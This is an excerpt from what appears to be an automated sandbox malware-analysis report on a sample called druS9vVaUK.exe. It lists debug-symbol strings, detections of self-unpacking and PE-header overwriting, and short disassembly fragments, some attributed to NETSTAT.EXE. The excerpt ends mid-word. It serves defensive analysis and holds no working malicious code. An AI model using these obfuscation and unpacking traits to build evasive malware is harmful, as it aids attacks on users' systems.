          Source: Binary string: wntdll.pdb source: druS9vVaUK.exe, 00000002.00000002.502552428.000000000100F000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: Binary string: mscorrc.pdb source: druS9vVaUK.exe, 00000000.00000002.453041651.0000000008880000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\druS9vVaUK.exeUnpacked PE file: 0.2.druS9vVaUK.exe.4a0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\druS9vVaUK.exeUnpacked PE file: 0.2.druS9vVaUK.exe.4a0000.0.unpack
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_004DD405 push es; retf 0_2_004DD41F
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BC2EED push esi; retf 0_2_00BC2EFA
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C60A35 push cs; iretd 0_2_00C60A3E
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C879E9 push esp; retf 0_2_00C87A02
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C887D9 push edi; iretd 0_2_00C887DA
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C873B4 push dword ptr [ecx+35B307F2h]; ret 0_2_00C873C9
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00414058 pushad ; retf 2_2_00414059
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00419A35 push eax; ret 2_2_00419A88
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00419AEC push eax; ret 2_2_00419AF2
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00419A82 push eax; ret 2_2_00419A88
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00419A8B push eax; ret 2_2_00419AF2
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_0041AEEA push eax; ret 2_2_0041AEF1
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_004BD405 push es; retf 2_2_004BD41F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034CDE2D push ecx; ret 5_2_034CDE40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B9A35 push eax; ret 5_2_032B9A88
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B9A8B push eax; ret 5_2_032B9AF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B9A82 push eax; ret 5_2_032B9A88
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B9AEC push eax; ret 5_2_032B9AF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032BAEEA push eax; ret 5_2_032BAEF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032BA486 pushad ; ret 5_2_032BA487
          Source: initial sampleStatic PE infor